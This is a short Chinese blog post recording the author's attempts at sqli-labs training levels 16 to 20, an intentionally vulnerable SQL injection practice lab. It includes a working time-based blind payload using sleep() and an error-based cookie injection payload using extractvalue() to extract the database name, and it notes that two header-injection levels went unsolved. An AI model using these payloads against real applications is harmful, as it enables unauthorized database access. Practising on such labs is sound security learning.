sqli-labs闯关记录(Less16-Less20)

本文记录了在sqli-labs中关于SQL注入的挑战,包括Less-16的Blind-Time Based攻击,Less-17的Update Query利用,以及Less-18和Less-19的Header Injection尝试,虽然遇到了困难但未给出详细解决方法。此外,介绍了Less-20的Cookie Injection,通过修改cookie参数实现注入。
摘要由CSDN通过智能技术生成

Less-16 Blind-Time Based-Double quotes-String

正确直接登录,错误延迟5秒。

payload:uname=admin") and if(ascii(substr(database(),1,1))>114,1,sleep(5))

在这里插入图片描述

Less-17 Update Query-Error based-String

uname无法注入,passwd注入
在这里插入图片描述

Less-18 Header Injection- Error Based- string

怎么注怎么出不来 网上查了一下也不行,后面再补吧

Less-19 Header Injection- Referer- Error Based- string

怎么注怎么出不来 网上查了一下也不行,后面再补吧

Less-20 Cookie Injection- Error Based- string

这里是cookie注入,修改cookie的参数
payload:uname='and extractvalue(0x7e,concat(0x7e,database(),0x7e))#
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值